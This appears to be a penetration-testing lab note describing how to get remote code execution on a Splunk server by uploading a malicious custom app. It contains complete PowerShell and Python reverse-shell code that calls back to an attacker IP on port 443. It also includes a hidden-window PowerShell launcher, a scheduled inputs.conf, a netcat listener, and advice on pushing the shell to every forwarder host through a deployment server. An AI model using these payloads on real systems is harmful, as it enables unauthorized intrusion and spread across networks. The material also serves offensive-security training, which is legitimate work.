# Intro -  We can gain RCE on Splunk by creating a custom application to run Python, Batch, Bash, or PowerShell scripts - From the `nmap` scans, we noticed that our target is a Windows server - Since Splunk comes with Python installed, we can create a custom Splunk application that gives us RCE using Python or a PowerShell script # Abusing Built-in Upload Functionality - We can use [this](https://github.com/0xjpuff/reverse_shell_splunk) Splunk package to assist us - The `bin` directory in this repo has examples for Python and PowerShell - The default directory will have our `inputs.conf` file - Powershell one-liner below ```powershell #A simple and small reverse shell. Options and help removed to save space. #Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. $client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` - The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk which script to run and any other conditions - Here we set the app as enabled and tell Splunk to run the script every 10 second ```bash cat inputs.conf [script://./bin/rev.py] disabled = 0 interval = 10 sourcetype = shell [script://.\bin\run.bat] disabled = 0 sourcetype = shell interval = 10 ``` ## Targeting a Windows Host - Since we are attacking Splunk on a Windows server we need the `.bat` file ```bash @ECHO OFF PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'" Exit ``` - Now cerate a tarball or `.spl` file ```vbash tar -cvzf updater.tar.gz splunk_shell/ ``` - Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat) ```bash sudo nc -lnvp 443 ``` - Next, choose `Install app from file` and upload the application ![[images/Pasted image 20260123203013.png]] - On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`![[images/Pasted image 20260123203122.png]] - As soon as we upload the application, a reverse shell is received as the status of the application will automatically be switched to `Enabled` ## Targeting a Linux Host - If we were dealing with a Linux host, we would need to edit the `rev.py` Python script before creating the tarball and uploading the custom malicious app ```python import sys,socket,os,pty ip="10.10.14.15" port="443" s=socket.socket() s.connect((ip,int(port))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn('/bin/bash') ``` # Misc Environments - If the compromised Splunk host is a deployment server, it will likely be possible to achieve RCE on any hosts with Universal Forwarders installed on them - To push a reverse shell out to other hosts, the application must be placed in the `$SPLUNK_HOME/etc/deployment-apps` directory on the compromised host # Exercise - clone the `reverse_shell_splunk` repo ```bash sudo git clone https://github.com/0xjpuff/reverse_shell_splunk.git ``` ![[images/Pasted image 20260123203806.png]] ![[images/Pasted image 20260123203839.png]] - edit `run.ps1` and `rev.py` to include Kali I{} and port - archive the directory ```bash sudo tar -cvzf updater.tar.gz reverse_shell_splunk/ ``` - start listener on Kali box ![[images/Pasted image 20260123204902.png]] - go to `manage apps` from dashboard ![[images/Pasted image 20260123204933.png]] - click on `install app from file` ![[images/Pasted image 20260123204954.png]] - upload tarball ![[images/Pasted image 20260123205106.png]] - we immediately catch a shell on listener ![[images/Pasted image 20260123205158.png]]